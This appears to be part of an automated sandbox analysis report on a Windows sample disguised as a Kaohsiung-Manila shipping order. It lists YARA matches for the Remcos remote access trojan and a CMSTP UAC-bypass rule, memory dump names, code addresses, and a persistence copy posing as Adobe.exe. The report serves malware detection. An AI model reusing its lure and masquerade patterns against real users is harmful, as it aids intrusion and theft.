                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2247441432.0000000000F47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2047950519.0000000001267000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000E.00000002.2327232741.0000000001727000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.2170021457.0000000001567000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4507004110.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1532, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 1812, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5296, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: Adobe.exe PID: 5228, type: MEMORYSTR

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Contains functionalty to change the wallpaper
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041BB77 SystemParametersInfoW,3_2_0041BB77

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000003.00000002.2043076649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 3668, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe PID: 7152, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,3_2_004158B9
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_02BBD63C0_2_02BBD63C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_05286CE80_2_05286CE8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_052800070_2_05280007
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_052800400_2_05280040
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_05286CE10_2_05286CE1
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FD7080_2_072FD708
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDC280_2_072FDC28
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDCFE0_2_072FDCFE
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FAA600_2_072FAA60
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7700_2_072FA770
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7B80_2_072FA7B8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FA7C80_2_072FA7C8
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FD6FB0_2_072FD6FB
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FDC1B0_2_072FDC1B
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 0_2_072FAA4F0_2_072FAA4F
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041D0713_2_0041D071
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004520D23_2_004520D2
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043D0983_2_0043D098
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004371503_2_00437150
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004361AA3_2_004361AA
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004262543_2_00426254
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004313773_2_00431377
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043651C3_2_0043651C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0041E5DF3_2_0041E5DF
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0044C7393_2_0044C739
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004367C63_2_004367C6
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_004267CB3_2_004267CB
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043C9DD3_2_0043C9DD
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00432A493_2_00432A49
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00436A8D3_2_00436A8D
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043CC0C3_2_0043CC0C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00436D483_2_00436D48
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00434D223_2_00434D22
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00426E733_2_00426E73
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00440E203_2_00440E20
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_0043CE3B3_2_0043CE3B
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00412F453_2_00412F45
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00452F003_2_00452F00
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: 3_2_00426FAD3_2_00426FAD
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 4_2_0094D63C4_2_0094D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 8_2_02D2D63C8_2_02D2D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_00B9D63C11_2_00B9D63C
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D76CE811_2_04D76CE8
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D7004011_2_04D70040
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D7000611_2_04D70006
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 11_2_04D76CE111_2_04D76CE1
                    Source: C:\ProgramData\Adobe\Adobe.exeCode function: 13_2_0151D63C13_2_0151D63C
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 004020E7 appears 39 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Users\user\Desktop\#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeCode function: String function: 00433FB0 appears 55 times
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2041986593.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2058808858.0000000008DD0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2042713103.0000000002DC8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2058181957.00000000070F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000000.2030232586.00000000009FA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuoct.exe4 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe, 00000000.00000002.2047465840.0000000003DB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeBinary or memory string: OriginalFilenameuoct.exe4 vs #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe
                    Source: #U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.48be488.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0.2.#U4f73#U5ddd#U7acb 20241202 KAOHSIUNG-MANILA NORTH PORT 1x20' SO.scr.exe.3e7b708.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000000.00000002.2047465840.00000000048BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
